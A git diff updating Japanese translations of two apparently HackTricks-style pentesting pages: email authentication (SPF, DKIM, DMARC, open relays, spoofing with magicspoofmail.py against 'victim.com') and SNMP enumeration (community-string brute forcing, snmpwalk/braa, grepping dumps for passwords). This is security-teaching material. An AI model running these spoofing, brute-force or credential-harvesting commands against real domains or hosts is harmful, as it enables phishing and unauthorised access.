+> さらに、以前のspfレコードを再利用するために、`"v=spf1 include:_spf.google.com ~all"`のようなものを見つけることは非常に一般的です。
 
-**Sender Policy Framework** (SPF) は、メール転送エージェント (MTA) が、メールを送信しているホストが組織によって定義された承認済みメールサーバーのリストを照会することで、そのホストがメールを送信する権限を持っているかどうかを確認できるメカニズムです。このリストには、**ドメイン名を代表してメールを送信することを許可された**さまざまな「**メカニズム**」が含まれています。
+**Sender Policy Framework**(SPF)は、メール転送エージェント(MTA)が、メールを送信しているホストが組織によって定義された承認されたメールサーバーのリストを照会することで、そのホストがメールを送信する権限があるかどうかを確認できるメカニズムです。このリストには、**ドメイン名を代表してメールを送信することを許可された**さまざまな「**メカニズム**」が含まれています。
 
 #### メカニズム
 
-[Wikipedia](https://en.wikipedia.org/wiki/Sender_Policy_Framework) より:
+[Wikipedia](https://en.wikipedia.org/wiki/Sender_Policy_Framework)から:
 
 | メカニズム | 説明                                                                                                                                                                                                                                                                                                                         |
 | --------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| ALL       | 常に一致します。以前のメカニズムで一致しなかったすべての IP に対して `-all` のようなデフォルト結果に使用されます。                                                                                                                                                                                                                                  |
-| A         | ドメイン名に送信者のアドレスに解決できるアドレスレコード (A または AAAA) がある場合、一致します。                                                                                                                                                                                                                   |
-| IP4       | 送信者が指定された IPv4 アドレス範囲にある場合、一致します。                                                                                                                                                                                                                                                                              |
-| IP6       | 送信者が指定された IPv6 アドレス範囲にある場合、一致します。                                                                                                                                                                                                                                                                              |
-| MX        | ドメイン名に送信者のアドレスに解決する MX レコードがある場合、一致します(つまり、メールはドメインの受信メールサーバーの1つから来ます)。                                                                                                                                                                          |
-| PTR       | クライアントのアドレスのドメイン名 (PTR レコード) が指定されたドメインにあり、そのドメイン名がクライアントのアドレスに解決する場合(前方確認された逆 DNS)、一致します。このメカニズムは推奨されず、可能な限り避けるべきです。                                                                                     |
-| EXISTS    | 指定されたドメイン名が任意のアドレスに解決する場合、一致します(解決されるアドレスに関係なく)。これはめったに使用されません。SPF マクロ言語と組み合わせることで、DNSBL クエリのようなより複雑な一致を提供します。                                                                                                                           |
-| INCLUDE   | 別のドメインのポリシーを参照します。そのドメインのポリシーが合格すれば、このメカニズムも合格します。ただし、含まれたポリシーが失敗した場合、処理は続行されます。他のドメインのポリシーに完全に委任するには、リダイレクト拡張を使用する必要があります。                                                                                     |
-| REDIRECT  | 
リダイレクトは、SPF ポリシーをホストする別のドメイン名へのポインタです。これにより、複数のドメインが同じ SPF ポリシーを共有できます。これは、同じメールインフラストラクチャを共有する多数のドメインを扱う際に便利です。
リダイレクトメカニズムで示されたドメインの SPF ポリシーが使用されます。
 |
+| ALL       | 常に一致します。以前のメカニズムで一致しなかったすべてのIPに対して、`-all`のようなデフォルトの結果に使用されます。                                                                                                                                                                                                                                  |
+| A         | ドメイン名に送信者のアドレスに解決できるアドレスレコード(AまたはAAAA)がある場合、一致します。                                                                                                                                                                                                                   |
+| IP4       | 送信者が指定されたIPv4アドレス範囲にある場合、一致します。                                                                                                                                                                                                                                                                              |
+| IP6       | 送信者が指定されたIPv6アドレス範囲にある場合、一致します。                                                                                                                                                                                                                                                                              |
+| MX        | ドメイン名に送信者のアドレスに解決するMXレコードがある場合、一致します(つまり、メールはドメインの受信メールサーバーの1つから来ます)。                                                                                                                                                                          |
+| PTR       | クライアントのアドレスのドメイン名(PTRレコード)が指定されたドメインにあり、そのドメイン名がクライアントのアドレスに解決する場合(前方確認された逆DNS)、一致します。このメカニズムは推奨されず、可能な限り避けるべきです。                                                                                     |
+| EXISTS    | 指定されたドメイン名が任意のアドレスに解決する場合、一致します(解決されるアドレスに関係なく)。これはめったに使用されません。SPFマクロ言語と組み合わせることで、DNSBLクエリのようなより複雑な一致を提供します。                                                                                                                           |
+| INCLUDE   | 別のドメインのポリシーを参照します。そのドメインのポリシーが通過すれば、このメカニズムも通過します。ただし、含まれたポリシーが失敗した場合、処理は続行されます。他のドメインのポリシーに完全に委任するには、リダイレクト拡張を使用する必要があります。                                                                                     |
+| REDIRECT  | 
リダイレクトは、SPFポリシーをホストする別のドメイン名へのポインタであり、複数のドメインが同じSPFポリシーを共有できるようにします。これは、同じメールインフラストラクチャを共有する多数のドメインを扱う際に便利です。
リダイレクトメカニズムで示されたドメインのSPFポリシーが使用されます。
 |
 
-**クオリファイア**を特定することも可能で、**メカニズムが一致した場合に何をすべきか**を示します。デフォルトでは、**クオリファイア "+"** が使用されます(したがって、いずれかのメカニズムが一致する場合、それは許可されていることを意味します)。\
-通常、各 SPF ポリシーの**最後に**、**\~all** または **-all** のようなものが記載されています。これは、**送信者がどの SPF ポリシーにも一致しない場合、メールを信頼できないとタグ付けする(\~)か、メールを拒否する(-)べきであることを示します。**
+**クオリファイア**を特定することも可能で、**メカニズムが一致した場合に何をすべきか**を示します。デフォルトでは、**クオリファイア「+」**が使用されます(したがって、いずれかのメカニズムが一致する場合、それは許可されていることを意味します)。\
+通常、**各SPFポリシーの最後に**、**\~all**または**-all**のようなものが記載されています。これは、**送信者がどのSPFポリシーにも一致しない場合、メールを信頼できない(\~)としてタグ付けするか、メールを拒否する(-)べきであることを示します。**
 
 #### クオリファイア
 
-ポリシー内の各メカニズムは、意図された結果を定義するために、4 つのクオリファイアのいずれかでプレフィックスを付けることができます:
+ポリシー内の各メカニズムは、意図された結果を定義するために4つのクオリファイアのいずれかで接頭辞を付けることができます:
 
-- **`+`**: PASS 結果に対応します。デフォルトでは、メカニズムはこのクオリファイアを仮定し、`+mx` は `mx` と同等です。
-- **`?`**: NEUTRAL 結果を表し、NONE(特定のポリシーなし)と同様に扱われます。
-- **`~`**: SOFTFAIL を示し、NEUTRAL と FAIL の中間に位置します。この結果を満たすメールは通常受け入れられますが、適切にマークされます。
-- **`-`**: FAIL を示し、メールは完全に拒否されるべきであることを示唆します。
+- **`+`**: PASS結果に対応します。デフォルトで、メカニズムはこのクオリファイアを仮定し、`+mx`は`mx`と同等です。
+- **`?`**: NEUTRAL結果を表し、NONE(特定のポリシーなし)と同様に扱われます。
+- **`~`**: SOFTFAILを示し、NEUTRALとFAILの中間の立場を取ります。この結果に該当するメールは通常受け入れられますが、適切にマークされます。
+- **`-`**: FAILを示し、メールは完全に拒否されるべきであることを示唆します。
 
-次の例では、**google.com の SPF ポリシー**が示されています。最初の SPF ポリシー内に異なるドメインからの SPF ポリシーが含まれていることに注意してください:
+次の例では、**google.comのSPFポリシー**が示されています。最初のSPFポリシー内に異なるドメインからのSPFポリシーが含まれていることに注意してください:
 ```shell-session
 dig txt google.com | grep spf
 google.com.             235     IN      TXT     "v=spf1 include:_spf.google.com ~all"
@@ -286,13 +286,13 @@ _netblocks2.google.com. 1908    IN      TXT     "v=spf1 ip6:2001:4860:4000::/36
 dig txt _netblocks3.google.com | grep spf
 _netblocks3.google.com. 1903    IN      TXT     "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"
 ```
-従来、正しい/任意のSPFレコードを持たないドメイン名を偽装することが可能でした。**現在では**、**有効なSPFレコードを持たないドメインからの** **メール**は、おそらく**自動的に拒否される/信頼されていないとマークされる**でしょう。
+従来、正しい/任意のSPFレコードを持たない任意のドメイン名を偽装することが可能でした。**現在**、**メール**が**有効なSPFレコードを持たないドメインから送信される場合**、おそらく**自動的に拒否される/信頼されていないとマークされる**でしょう。
 
 ドメインのSPFを確認するには、次のようなオンラインツールを使用できます: [https://www.kitterman.com/spf/validate.html](https://www.kitterman.com/spf/validate.html)
 
 ### DKIM (DomainKeys Identified Mail)
 
-DKIMは、外部のメール転送エージェント(MTA)による検証を可能にするために、送信メールに署名するために利用されます。これにより、ドメインの公開鍵をDNSから取得します。この公開鍵は、ドメインのTXTレコードにあります。この鍵にアクセスするには、セレクタとドメイン名の両方を知っている必要があります。
+DKIMは、外部のメール転送エージェント(MTA)による検証を可能にするために、送信メールに署名するために利用されます。これにより、ドメインの公開鍵をDNSから取得できます。この公開鍵は、ドメインのTXTレコードにあります。この鍵にアクセスするには、セレクタとドメイン名の両方を知っている必要があります。
 
 例えば、鍵を要求するには、ドメイン名とセレクタが必要です。これらはメールヘッダーの`DKIM-Signature`に見つけることができます。例: `d=gmail.com;s=20120113`。
 
@@ -304,7 +304,7 @@ dig 20120113._domainkey.gmail.com TXT | grep p=
 ```
 ### DMARC (Domain-based Message Authentication, Reporting & Conformance)
 
-DMARCは、SPFおよびDKIMプロトコルを基にしてメールセキュリティを強化します。特定のドメインからのメールの取り扱いに関するポリシーを定め、認証失敗への対処方法やメール処理アクションに関する報告を送信する場所を含みます。
+DMARCは、SPFおよびDKIMプロトコルを基にしてメールセキュリティを強化します。特定のドメインからのメールの取り扱いに関するポリシーを定め、認証失敗への対処方法やメール処理アクションに関する報告をどこに送信するかを示します。
 
 **DMARCレコードを取得するには、サブドメイン\_dmarcをクエリする必要があります**
 ```bash
@@ -324,40 +324,40 @@ _dmarc.bing.com.	3600	IN	TXT	"v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMA
 
 | タグ名   | 目的                                         | サンプル                          |
 | -------- | --------------------------------------------- | ------------------------------- |
-| v        | プロトコルバージョン                          | v=DMARC1                        |
-| pct      | フィルタリングの対象となるメッセージの割合   | pct=20                          |
-| ruf      | フォレンジックレポートの報告URI             | ruf=mailto:authfail@example.com |
-| rua      | 集約レポートの報告URI                        | rua=mailto:aggrep@example.com   |
+| v        | プロトコルバージョン                        | v=DMARC1                        |
+| pct      | フィルタリング対象のメッセージの割合        | pct=20                          |
+| ruf      | 法医学レポートの報告URI                     | ruf=mailto:authfail@example.com |
+| rua      | 集約レポートの報告URI                       | rua=mailto:aggrep@example.com   |
 | p        | 組織ドメインのポリシー                       | p=quarantine                    |
 | sp       | ODのサブドメインのポリシー                   | sp=reject                       |
-| adkim    | DKIMの整合性モード                           | adkim=s                         |
-| aspf     | SPFの整合性モード                            | aspf=r                          |
+| adkim    | DKIMの整合性モード                          | adkim=s                         |
+| aspf     | SPFの整合性モード                           | aspf=r                          |
 
 ### **サブドメインについては?**
 
-**こちら**から。\
-メールを送信する各サブドメインに対して、別々のSPFレコードを持つ必要があります。\
+**ここから** [**こちら**](https://serverfault.com/questions/322949/do-spf-records-for-primary-domain-apply-to-subdomains)**.**\
+メールを送信する各サブドメインには、別々のSPFレコードが必要です。\
 以下は、以前openspf.orgに投稿されたもので、この種の情報にとって素晴らしいリソースでした。
 
 > デーモンの質問: サブドメインについては?
 >
-> pielovers.demon.co.ukからメールを受け取った場合、pieloversのSPFデータがない場合、1つ上のレベルに戻ってdemon.co.ukのSPFをテストすべきですか? いいえ。Demonの各サブドメインは異なる顧客であり、各顧客は独自のポリシーを持っている可能性があります。Demonのポリシーがデフォルトで全顧客に適用されるのは理にかなっていません。Demonがそれを望む場合、各サブドメインのためにSPFレコードを設定できます。
+> pielovers.demon.co.ukからメールを受け取った場合、pieloversのSPFデータがない場合、1つ上のレベルに戻ってdemon.co.ukのSPFをテストすべきですか? いいえ。Demonの各サブドメインは異なる顧客であり、各顧客は独自のポリシーを持っている可能性があります。Demonのポリシーがすべての顧客にデフォルトで適用されるのは理にかなっていません。Demonがそれを望む場合、各サブドメインのためにSPFレコードを設定できます。
 >
 > したがって、SPF発行者へのアドバイスは次のとおりです: AまたはMXレコードを持つ各サブドメインまたはホスト名に対してSPFレコードを追加する必要があります。
 >
 > ワイルドカードAまたはMXレコードを持つサイトは、次の形式のワイルドカードSPFレコードも持つべきです: \* IN TXT "v=spf1 -all"
 
-これは理にかなっています - サブドメインは異なる地理的位置にあり、非常に異なるSPF定義を持つ可能性があります。
+これは理にかなっています - サブドメインは異なる地理的場所にあり、非常に異なるSPF定義を持つ可能性があります。
 
 ### **オープンリレー**
 
-メールが送信される際、スパムとしてフラグが立てられないようにすることが重要です。これは、**受信者によって信頼されるリレーサーバーを使用することで達成されることが多い**です。しかし、一般的な課題は、管理者がどの**IP範囲が許可されるべきかを完全に理解していない可能性があることです**。この理解の欠如は、SMTPサーバーの設定におけるミスにつながる可能性があり、これはセキュリティ評価で頻繁に指摘されるリスクです。
+メールが送信される際、スパムとしてフラグが立てられないようにすることが重要です。これは、**受信者によって信頼されるリレーサーバー**を使用することで達成されることが多いです。しかし、一般的な課題は、管理者がどの**IP範囲が許可されるべきかを完全に理解していない**ことです。この理解の欠如は、SMTPサーバーの設定におけるミスを引き起こす可能性があり、これはセキュリティ評価で頻繁に特定されるリスクです。
 
-特に潜在的または進行中のクライアントとの通信に関して、メール配信の問題を回避するために、一部の管理者が使用する回避策は、**任意のIPアドレスからの接続を許可することです**。これは、以下に示すように、SMTPサーバーの`mynetworks`パラメータをすべてのIPアドレスを受け入れるように設定することで行われます。
+特に潜在的または進行中のクライアントとの通信に関するメール配信の問題を回避するために、一部の管理者が使用する回避策は、**任意のIPアドレスからの接続を許可すること**です。これは、以下に示すように、SMTPサーバーの`mynetworks`パラメータをすべてのIPアドレスを受け入れるように設定することで行われます。
 ```bash
 mynetworks = 0.0.0.0/0
 ```
-メールサーバーがオープンリレーであるかどうかを確認するために(これは外部ソースからのメールを転送できることを意味します)、`nmap`ツールが一般的に使用されます。これには、これをテストするために設計された特定のスクリプトが含まれています。`nmap`を使用してポート25でサーバー(例えば、IP 10.10.10.10)に対して詳細スキャンを実行するためのコマンドは次のとおりです:
+メールサーバーがオープンリレーであるかどうかを確認するために(これは外部ソースからのメールを転送できることを意味します)、`nmap`ツールが一般的に使用されます。これには、これをテストするために設計された特定のスクリプトが含まれています。サーバー(例えば、IP 10.10.10.10)でポート25を使用して`nmap`で詳細スキャンを実行するためのコマンドは次のとおりです:
 ```bash
 nmap -p25 --script smtp-open-relay 10.10.10.10 -v
 ```
@@ -382,8 +382,8 @@ python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com
 python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com
 ```
 > [!WARNING]
-> DKIM Pythonライブラリを使用してキーを解析する際に**エラーが発生した場合**は、以下のものを自由に使用してください。\
-> **注意**: これは、何らかの理由でopensslプライベートキーが**dkimによって解析できない**場合に、迅速なチェックを行うための単なる簡易的な修正です。
+> DKIM Pythonライブラリで**キーの解析中にエラーが発生した場合**は、以下のものを自由に使用してください。\
+> **注意**: これは、何らかの理由でopensslプライベートキーが**dkimによって解析できない**場合に迅速なチェックを行うための簡易的な修正です。
 >
 > ```
 > -----BEGIN RSA PRIVATE KEY-----
@@ -475,7 +475,7 @@ s.sendmail(sender, [destination], msg_data)
 
 ### **詳細情報**
 
-**これらの保護に関する詳細情報は** [**https://seanthegeek.net/459/demystifying-dmarc/**](https://seanthegeek.net/459/demystifying-dmarc/) **で見つけてください。**
+**これらの保護に関する詳細情報は** [**https://seanthegeek.net/459/demystifying-dmarc/**](https://seanthegeek.net/459/demystifying-dmarc/) **で確認できます。**
 
 ### **その他のフィッシング指標**
 
diff --git a/src/network-services-pentesting/pentesting-snmp/README.md b/src/network-services-pentesting/pentesting-snmp/README.md
index 46744a071..654b1c739 100644
--- a/src/network-services-pentesting/pentesting-snmp/README.md
+++ b/src/network-services-pentesting/pentesting-snmp/README.md
@@ -4,22 +4,22 @@
 
 ## 基本情報
 
-**SNMP - シンプルネットワーク管理プロトコル** は、ネットワーク内のさまざまなデバイス(ルーター、スイッチ、プリンター、IoTなど)を監視するために使用されるプロトコルです。
+**SNMP - シンプルネットワーク管理プロトコル** は、ネットワーク内のさまざまなデバイス(ルーター、スイッチ、プリンター、IoT など)を監視するために使用されるプロトコルです。
 ```
 PORT    STATE SERVICE REASON                 VERSION
 161/udp open  snmp    udp-response ttl 244   ciscoSystems SNMPv3 server (public)
 ```
-> [!NOTE]
+> [!TIP]
 > SNMPは**162/UDP**ポートを**トラップ**に使用します。これは、**SNMPサーバーからクライアントに明示的に要求されることなく送信されるデータパケット**です。
 
 ### MIB
 
-SNMPアクセスが異なるメーカーやクライアント-サーバーの組み合わせで機能することを保証するために、**Management Information Base (MIB)**が作成されました。MIBは、**デバイス情報を保存するための独立したフォーマット**です。MIBは、デバイスのすべてのクエリ可能な**SNMPオブジェクト**が**標準化された**ツリー階層にリストされている**テキスト**ファイルです。少なくとも1つの`Object Identifier`(`OID`)を含み、必要な**ユニークアドレス**と**名前**に加えて、タイプ、アクセス権、およびそれぞれのオブジェクトの説明に関する情報も提供します。\
+SNMPアクセスが異なるメーカーやクライアント-サーバーの組み合わせで機能することを保証するために、**Management Information Base (MIB)**が作成されました。MIBは、**デバイス情報を保存するための独立したフォーマット**です。MIBは、デバイスのすべてのクエリ可能な**SNMPオブジェクト**が**標準化された**ツリー階層でリストされている**テキスト**ファイルです。少なくとも1つの`Object Identifier`(`OID`)を含み、必要な**一意のアドレス**と**名前**に加えて、オブジェクトのタイプ、アクセス権、およびそれぞれのオブジェクトの説明に関する情報も提供します。\
 MIBファイルは、`Abstract Syntax Notation One`(`ASN.1`)に基づくASCIIテキストフォーマットで記述されています。**MIBはデータを含まない**が、**どこにどの情報があるか**、それがどのように見えるか、特定のOIDに対して返される値、または使用されるデータ型について説明します。
 
 ### OIDs
 
-**Object Identifiers (OIDs)**は重要な役割を果たします。これらのユニークな識別子は、**Management Information Base (MIB)**内のオブジェクトを管理するために設計されています。
+**Object Identifiers (OIDs)**は重要な役割を果たします。これらの一意の識別子は、**Management Information Base (MIB)**内のオブジェクトを管理するために設計されています。
 
 MIBオブジェクトID、またはOIDの最上位レベルは、さまざまな標準設定機関に割り当てられています。これらの上位レベル内で、グローバルな管理慣行と標準のフレームワークが確立されます。
 
@@ -27,25 +27,25 @@ MIBオブジェクトID、またはOIDの最上位レベルは、さまざまな
 
 ![](<../../images/SNMP_OID_MIB_Tree (1).png>)
 
-ウェブ上で**OIDツリー**を**ナビゲート**することができます: [http://www.oid-info.com/cgi-bin/display?tree=#focus](http://www.oid-info.com/cgi-bin/display?tree=#focus) または**OIDの意味を確認する**(例えば`1.3.6.1.2.1.1`)には[http://oid-info.com/get/1.3.6.1.2.1.1](http://oid-info.com/get/1.3.6.1.2.1.1)にアクセスします。\
-いくつかの**よく知られたOID**があります。例えば、[1.3.6.1.2.1](http://oid-info.com/get/1.3.6.1.2.1)内のOIDは、MIB-2で定義されたSimple Network Management Protocol (SNMP)変数を参照しています。また、このOIDから**保留中のOID**を使用して、興味深いホストデータ(システムデータ、ネットワークデータ、プロセスデータなど)を取得できます。
+ここから**OIDツリーをナビゲート**できます: [http://www.oid-info.com/cgi-bin/display?tree=#focus](http://www.oid-info.com/cgi-bin/display?tree=#focus) または**OIDの意味を確認**できます(例えば`1.3.6.1.2.1.1`): [http://oid-info.com/get/1.3.6.1.2.1.1](http://oid-info.com/get/1.3.6.1.2.1.1)。\
+**よく知られたOID**には、MIB-2で定義されたSimple Network Management Protocol (SNMP)変数を参照する[1.3.6.1.2.1](http://oid-info.com/get/1.3.6.1.2.1)のようなものがあります。また、このOIDから**保留中のOID**を使用して、興味深いホストデータ(システムデータ、ネットワークデータ、プロセスデータなど)を取得できます。
 
 ### **OIDの例**
 
-[**こちらからの例**](https://www.netadmintools.com/snmp-mib-and-oids/):
+[**こちらの例**](https://www.netadmintools.com/snmp-mib-and-oids/):
 
 **`1 . 3 . 6 . 1 . 4 . 1 . 1452 . 1 . 2 . 5 . 1 . 3. 21 . 1 . 4 . 7`**
 
-このアドレスの内訳は以下の通りです。
+このアドレスの内訳は次のとおりです。
 
 - 1 – これはISOと呼ばれ、これがOIDであることを示します。すべてのOIDが「1」で始まるのはこのためです。
 - 3 – これはORGと呼ばれ、デバイスを製造した組織を指定するために使用されます。
 - 6 – これはdodまたは国防総省で、最初にインターネットを確立した組織です。
 - 1 – これはインターネットの値で、すべての通信がインターネットを通じて行われることを示します。
-- 4 – この値は、このデバイスが政府機関ではなく民間組織によって製造されたことを示します。
+- 4 – この値は、このデバイスが政府ではなく民間の組織によって製造されたことを示します。
 - 1 – この値は、デバイスが企業またはビジネスエンティティによって製造されたことを示します。
 
-これらの最初の6つの値はすべてのデバイスで同じ傾向があり、基本的な情報を提供します。この数のシーケンスは、デバイスが政府によって製造されていない限り、すべてのOIDで同じになります。
+これらの最初の6つの値はすべてのデバイスで同じ傾向があり、基本的な情報を提供します。この数の列は、デバイスが政府によって製造されていない限り、すべてのOIDで同じになります。
 
 次の数のセットに進みます。
 
@@ -65,7 +65,7 @@ MIBオブジェクトID、またはOIDの最上位レベルは、さまざまな
 
 ### SNMPバージョン
 
-SNMPには2つの重要なバージョンがあります。
+SNMPには2つの重要なバージョンがあります:
 
 - **SNMPv1**: 主なもので、最も頻繁に使用され、**認証は文字列**(コミュニティ文字列)に基づいており、**平文**で送信されます(すべての情報が平文で送信されます)。**バージョン2および2c**も**平文でトラフィックを送信**し、**コミュニティ文字列を認証**として使用します。
 - **SNMPv3**: より良い**認証**形式を使用し、情報は**暗号化**されて送信されます(**辞書攻撃**は実行可能ですが、SNMPv1およびv2よりも正しいクレデンシャルを見つけるのがはるかに難しくなります)。
@@ -78,8 +78,8 @@ SNMPには2つの重要なバージョンがあります。
 - **`public`** 主に**読み取り専用**機能
 - **`private`** **読み書き**一般
 
-**OIDの書き込み可能性は使用されるコミュニティ文字列に依存する**ため、**たとえ**「**public**」が使用されている場合でも、**いくつかの値を書き込むことができるかもしれません**。また、**常に「読み取り専用」のオブジェクトが存在する可能性があります**。\
-オブジェクトに**書き込もうとすると、`noSuchName`または`readOnly`エラーが返されます**。
+**OIDの書き込み可能性は使用されるコミュニティ文字列に依存する**ため、**たとえ**「**public**」が使用されている場合でも、**いくつかの値を書き込むことができるかもしれません。**また、**常に「読み取り専用」のオブジェクトが存在する可能性があります。**\
+オブジェクトに**書き込もうとすると、**`noSuchName`または`readOnly`エラーが返されます。**
 
 バージョン1および2/2cでは、**不正な**コミュニティ文字列を使用すると、サーバーは**応答しません**。したがって、応答がある場合は、**有効なコミュニティ文字列が使用された**ことになります。
 
@@ -104,7 +104,7 @@ download-mibs
 # Finally comment the line saying "mibs :" in /etc/snmp/snmp.conf
 sudo vi /etc/snmp/snmp.conf
 ```
-有効なコミュニティストリングを知っていれば、**SNMPWalk**または**SNMP-Check**を使用してデータにアクセスできます:
+有効なコミュニティストリングを知っていれば、**SNMPWalk**または**SNMP-Check**を使用してデータにアクセスできます:
 ```bash
 snmpbulkwalk -c [COMM_STRING] -v [VERSION] [IP] . #Don't forget the final dot
 snmpbulkwalk -c public -v2c 10.10.11.136 .
@@ -124,9 +124,9 @@ braa @:.1.3.6.* #Bruteforce specific OID
 ```bash
 snmpwalk -v X -c public  NET-SNMP-EXTEND-MIB::nsExtendOutputFull
 ```
-**SNMP**にはホストに関する多くの情報が含まれており、興味深いものには以下が含まれます: **ネットワークインターフェース**(IPv4および**IPv6**アドレス)、ユーザー名、稼働時間、サーバー/OSバージョン、そして**プロセス** 
+**SNMP** にはホストに関する多くの情報が含まれており、興味深いものには次のようなものがあります: **ネットワークインターフェース** (IPv4 および **IPv6** アドレス)、ユーザー名、稼働時間、サーバー/OS バージョン、および **プロセス**
 
-**実行中**(パスワードを含む可能性があります)....
+**実行中** (パスワードを含む可能性があります)....
 
 ### **危険な設定**
 
@@ -134,60 +134,56 @@ snmpwalk -v X -c public  NET-SNMP-EXTEND-MIB::nsExtendOutputFull
 
 ### アクセス設定
 
-**フルOIDツリー**へのアクセスを可能にする2つの主要な設定があります。これはネットワーク管理において重要な要素です:
+**フル OID ツリー** へのアクセスを可能にする2つの主要な設定があります。これはネットワーク管理において重要な要素です:
 
-1. **`rwuser noauth`**は、認証なしでOIDツリーへのフルアクセスを許可するように設定されています。この設定は簡単で、制限のないアクセスを可能にします。
-2. より具体的な制御のために、以下を使用してアクセスを付与できます:
-- **`rwcommunity`**は**IPv4**アドレス用、そして
-- **`rwcommunity6`**は**IPv6**アドレス用です。
+1. **`rwuser noauth`** は、認証なしで OID ツリーへのフルアクセスを許可するように設定されています。この設定は簡単で、制限のないアクセスを可能にします。
+2. より具体的な制御のために、次のようにアクセスを付与できます:
+- **`rwcommunity`** は **IPv4** アドレス用、そして
+- **`rwcommunity6`** は **IPv6** アドレス用です。
 
-両方のコマンドは**コミュニティ文字列**と関連するIPアドレスを必要とし、リクエストの起源に関係なくフルアクセスを提供します。
+両方のコマンドは **コミュニティ文字列** と関連する IP アドレスを必要とし、リクエストの起源に関係なくフルアクセスを提供します。
 
-### Microsoft WindowsのSNMPパラメータ
+### Microsoft Windows 用の SNMP パラメータ
 
-一連の**管理情報ベース(MIB)値**が、SNMPを通じてWindowsシステムのさまざまな側面を監視するために利用されます:
+一連の **管理情報ベース (MIB) 値** が、SNMP を通じて Windows システムのさまざまな側面を監視するために利用されます:
 
-- **システムプロセス**: `1.3.6.1.2.1.25.1.6.0`を介してアクセスされ、このパラメータはシステム内のアクティブなプロセスの監視を可能にします。
-- **実行中のプログラム**: `1.3.6.1.2.1.25.4.2.1.2`の値は、現在実行中のプログラムを追跡するために指定されています。
-- **プロセスパス**: プロセスがどこから実行されているかを特定するために、`1.3.6.1.2.1.25.4.2.1.4`のMIB値が使用されます。
-- **ストレージユニット**: ストレージユニットの監視は`1.3.6.1.2.1.25.2.3.1.4`によって促進されます。
-- **ソフトウェア名**: システムにインストールされているソフトウェアを特定するために、`1.3.6.1.2.1.25.6.3.1.2`が使用されます。
-- **ユーザーアカウント**: `1.3.6.1.4.1.77.1.2.25`の値は、ユーザーアカウントの追跡を可能にします。
-- **TCPローカルポート**: 最後に、`1.3.6.1.2.1.6.13.1.3`はTCPローカルポートの監視に指定されており、アクティブなネットワーク接続に関する洞察を提供します。
+- **システムプロセス**: `1.3.6.1.2.1.25.1.6.0` を介してアクセスされ、このパラメータはシステム内のアクティブなプロセスの監視を可能にします。
+- **実行中のプログラム**: `1.3.6.1.2.1.25.4.2.1.2` の値は、現在実行中のプログラムを追跡するために指定されています。
+- **プロセスパス**: プロセスがどこから実行されているかを特定するために、`1.3.6.1.2.1.25.4.2.1.4` MIB 値が使用されます。
+- **ストレージユニット**: ストレージユニットの監視は `1.3.6.1.2.1.25.2.3.1.4` によって促進されます。
+- **ソフトウェア名**: システムにインストールされているソフトウェアを特定するために、`1.3.6.1.2.1.25.6.3.1.2` が使用されます。
+- **ユーザーアカウント**: `1.3.6.1.4.1.77.1.2.25` の値は、ユーザーアカウントの追跡を可能にします。
+- **TCP ローカルポート**: 最後に、`1.3.6.1.2.1.6.13.1.3` は TCP ローカルポートの監視に指定されており、アクティブなネットワーク接続に関する洞察を提供します。
 
 ### Cisco
 
-Cisco機器を使用している場合は、このページを参照してください:
+Cisco 機器については、このページを参照してください:
+
 
 {{#ref}}
 cisco-snmp.md
 {{#endref}}
 
-## SNMPからRCEへ
+## SNMP から RCE へ
+
+SNMP サービス内で **値を書き込む** ことを許可する **文字列** を持っている場合、それを悪用して **コマンドを実行** できる可能性があります:
 
-SNMPサービス内で**値を書き込む**ことを許可する**文字列**を持っている場合、それを悪用して**コマンドを実行**できる可能性があります:
 
 {{#ref}}
 snmp-rce.md
 {{#endref}}
 
-## **マッシブSNMP**
+## **マッシブ SNMP**
 
-[Braa](https://github.com/mteg/braa)は、大規模なSNMPスキャナーです。このようなツールの意図された使用法はもちろん、SNMPクエリを行うことですが、net-snmpのsnmpwalkとは異なり、数十または数百のホストに同時に、かつ単一のプロセスでクエリを行うことができます。したがって、非常に少ないシステムリソースを消費し、スキャンを非常に速く行います。
+[Braa](https://github.com/mteg/braa) はマス SNMP スキャナーです。このようなツールの意図された使用法は、もちろん SNMP クエリを行うことですが、net-snmp の snmpwalk とは異なり、数十または数百のホストに同時に、かつ単一のプロセスでクエリを行うことができます。したがって、非常に少ないシステムリソースを消費し、非常に速くスキャンを行います。
 
-Braaは独自のSNMPスタックを実装しているため、net-snmpのようなSNMPライブラリは必要ありません。
+Braa は独自の SNMP スタックを実装しているため、net-snmp のような SNMP ライブラリは必要ありません。
 
-**構文:** braa \[Community-string]@\ [IP of SNMP server]:\[iso id]
+**構文:** braa \[Community-string]@\[IP of SNMP server]:\[iso id]
 ```bash
 braa ignite123@192.168.1.125:.1.3.6.*
 ```
-これにより、手動で処理できない大量の情報を抽出できます。
-
-では、最も興味深い情報を探してみましょう([https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/](https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/)):
-
-### **デバイス**
-
-プロセスは、各ファイルから**sysDesc MIBデータ**(1.3.6.1.2.1.1.1.0)を抽出してデバイスを特定することから始まります。これは**grepコマンド**を使用して実行されます:
+このプロセスは、デバイスを特定するために各ファイルから**sysDesc MIBデータ**(1.3.6.1.2.1.1.1.0)を抽出することから始まります。これは**grepコマンド**を使用して実行されます。
 ```bash
 grep ".1.3.6.1.2.1.1.1.0" *.snmp
 ```
@@ -199,7 +195,7 @@ grep -i "trap" *.snmp
 ```
 ### **ユーザー名/パスワード**
 
-MIBテーブルに保存されたログは、**ログオン試行の失敗**を調べるために検査され、これにはユーザー名として入力されたパスワードが偶然含まれることがあります。_fail_、_failed_、または _login_ などのキーワードが、貴重なデータを見つけるために検索されます:
+MIBテーブルに保存されたログは、**ログオン試行の失敗**を調べるために検査され、これにはユーザー名として入力されたパスワードが含まれる可能性があります。_fail_、_failed_、または _login_ などのキーワードが、貴重なデータを見つけるために検索されます:
 ```bash
 grep -i "login\|fail" *.snmp
 ```
